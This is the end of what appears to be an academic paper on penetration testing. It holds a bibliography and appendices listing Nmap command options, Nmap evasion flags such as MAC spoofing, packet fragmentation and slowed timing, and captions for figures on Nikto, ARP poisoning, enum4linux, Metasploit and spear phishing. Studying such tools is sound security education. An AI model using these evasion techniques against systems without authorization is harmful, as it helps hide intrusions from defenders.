UK: Packt Publishing.
IBM. (2019). Data Breach. Retrieved from IBM Security : https://www.ibm.com/security/data-
breach
Identity Theft Resource Center. (2018). 2017 Annual Data Breach Year-End Review. Retrieved
from ID Theft Center: https://www.idtheftcenter.org/2017-data-breaches/
IEEE. (2019). 802.11 Standard Details. Retrieved from IEEE Standards Association:
https://standards.ieee.org/standard/802_11-2016.html
International Information Systems Security Certification Consortium. (2018). Cybersecurity
Professionals Focus on Developing New Skills as Workforce Gap Widens. Retrieved
from ISC2: https://www.isc2.org/-/media/ISC2/Research/2018-ISC2-Cybersecurity-
Workforce-Study.ashx?
la=en&hash=4E09681D0FB51698D9BA6BF13EEABFA48BD17DB0
Johns, A. (2015). Mastering Wireless Penetration Testing for Highly Secured Environments.
Birmingham, UK: Packt Publishing.
Khan, E., & Khan, F. (2012). A Comparative Study of White Box, Black Box and Grey Box
Testing Techniques. Sikkim: International Journal of Advanced Computer Science and
Applications.51
Kim, A. (2017). Even password protected Wi-Fi is unsafe, vulnerable to hacks: Researchers
[Internet]. Retrieved from ProQuest:
https://search-proquest-com.ezproxy.utica.edu/docview/1951664878
Lyon, G. (2008). Nmap Network Scanning. Sunnyvale, California, United States: Insecure.com
LLC.
Marriam-Webster. (2019). Internet. Retrieved from Marriam-Webster: https://www.merriam-
webster.com/dictionary/Internet
Morgan, S. (2017). Cybersecurity Jobs Report: 2017 Edition. Cybersecurity Ventures. Menlo
Park: Herjavec Group. Retrieved from
https://www.herjavecgroup.com/wp-content/uploads/2018/07/HG-and-CV-The-
Cybersecurity-Jobs-Report-2017.pdf
MRL. (2017). enum4linux. Retrieved from Portcullis Labs:
https://labs.portcullis.co.uk/tools/enum4linux/
Najera-Gutierrez, G., & Ansari, J. A. (2018). Web Penetration Testing with Kali Linux (Third
ed.). Birmingham, UK: Packt Publishing.
NIST. (2019). Blue Team. Retrieved from Computer Security Resource Center:
https://csrc.nist.gov/glossary/term/Blue-Team
NIST. (2019). Red Team. Retrieved from Computer Security Resource Center:
https://csrc.nist.gov/glossary/term/Red-Team
Offensive Security. (2019). Why Offensive Security. Retrieved from Offensive-Security:
https://www.offensive-security.com/why-offsec/
OWASP. (2019). Penetration Testing Methodologies. Retrieved from OWASP:
https://www.owasp.org/index.php/Penetration_testing_methodologies52
Patel, R. (2013). Kali Linux Social Engineering : Effectively Perform Efficient and Organized
Social Engineering Tests and Penetration Testing Using Kali Linux. Birmingham, UK:
Packt Publishing.
Pauli, J. (2013). The Basics of Web Hacking : Tools and Techniques to Attack the Web.
Amsterdam, Netherlands: Syngress.
PCI Security Standards. (2019). Responding to a Data Breach . Retrieved from
https://www.pcisecuritystandards.org/documents/PCI_SSC_PFI_Guidance.pdf
Pentest Standard. (2012). PTES Technical Guidelines. Retrieved from Pentest-Standard:
http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines#Identifying_IP_
Ranges
Pentest-Standard. (2012). Cracking Passwords. Retrieved from Penetration Testing Execution
Standard:
http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines#WPA-
PSK.2F_WPA2-PSK
Psiinon. (2015). OWASP ZAP User Guide. Retrieved from Github:
https://github.com/zaproxy/zap-core-help/wiki
Sanabria, E. (2018). Why the Best Defense Is a Good Offensive Security Strategy. Retrieved from
Security Intelligence: https://securityintelligence.com/why-the-best-defense-is-a-good-
offensive-security-strategy/
Sanders, C. (2017). Practical Packet Analysis. San Francisco, California, United States: No
Starch Press.
Sharma, H. (2017). Kali Linux - An Ethical Hacker's Cookbook. Birmingham, UK: Packt
Publishing.53
Sivarajan, S., Chaturvedi, S., Shetty, A., Parikh, K., & Youe, R. (2015). Getting Started with
Windows Server Security. Birmingham, UK: Packt Publishing.
Sood, A., & Enbody, R. (2014). Targeted Cyber Attacks. Waltham, Massachusetts, United
States: Syngress.
Stamparm. (2014). SQLMap Features. Retrieved from Github:
https://github.com/sqlmapproject/sqlmap/wiki/Features
Steube, J. (2019). Retrieved from Hashcat: Advanced Password Recovery:
https://hashcat.net/hashcat/
Sullo, C. (2019). Nikto. Retrieved from Github: https://github.com/sullo/nikto
Teixeira, D., Singh, A., & Agarwal, M. (2018). Metasploit Penetration Testing CookBook (Third
Edition ed.). Birmingham, UK: Packt Publishing.
Velu, V. K. (2017). Mastering Kali Linux for Advanced Penetration Testing. Birmingham, UK:
Packt Publishing.
Yerrid, K. (2013). Instant Netcat Starter. Birmingham, UK: Packt Publishing.
54
Appendix A
Table 1 - Example of Basic Nmap Command Options
option Example in a command Description
-A nmap -A 192.168.1.1Enables OS detection, version
detection, script scanning, and traceroute
-sV nmap -sV 192.168.1.1Attempts to determine the
version of the service running on port
-sC nmap -sC 192.168.1.1Scan with default NSE
scripts. Considered useful for discovery and safe
-f nmap -f 192.168.1.1
Requested scan (including ping scans) use tiny
fragmented IP packets. Harder for packet filters
-v nmap -v 192.168.1.1Increase the verbosity level (use -vv or more for greater
effect)
-h nmap -h Nmap help screen which displays many options
-p nmap -p 80 192.168.1.1 Specifies which port to (Lyon, 2008)
Table 2 - Nmap Stealth Scanning Options
Option Example Description
--spoof-mac-Cisco Spoofs MAC address shown in packets to show that it is a Cisco device.
--data-length 24 Adds 24 bits randomly to the majority of packets sent
-T paranoid This sets the speed of the scan to it’s slowest setting
-- max-hostgroup Limits the number of IPs scanned at once
-- max-parallelism or –scan-delay
Both commands limit the number of scanning probes sent out, limiting the number of
packets sent out in order to blend-in with normal traffic
-PN This stops Nmap form pinging active systems which can expose the scan
-f This option fragments packets to obscure the 55
intentions of the scan(Beggs, 2017, pp. 66-72)
56
Appendix B
Figure 1. Nikto Options 1
Note: This illustrates the options that Nikto offers when performing a scan
57
Figure 2. Nikto Options 2
Note: This illustrates the rest of the Nikto options when performing a scan
58
Figure 3. ARP Poisoning Before and After
Note: This illustrates how network traffic between two devices changes when an ARP poisoning
attack has been performed
59
Figure 4. Enum4Linux Help Page Output
Note: This illustrates the output of the help page for enum4linux. This shows the options
available when performing enumeration with enum4linux.
60
Figure 5. Syntax for Metasaploit
Note: This illustrates the syntax for Metasploit Framework command-line usage
61
Figure 6. Spear Phishing Model: Targeted Cyber Attack
Note: This figure illustrates the spear phishing attack model used to launch a targeted attack
62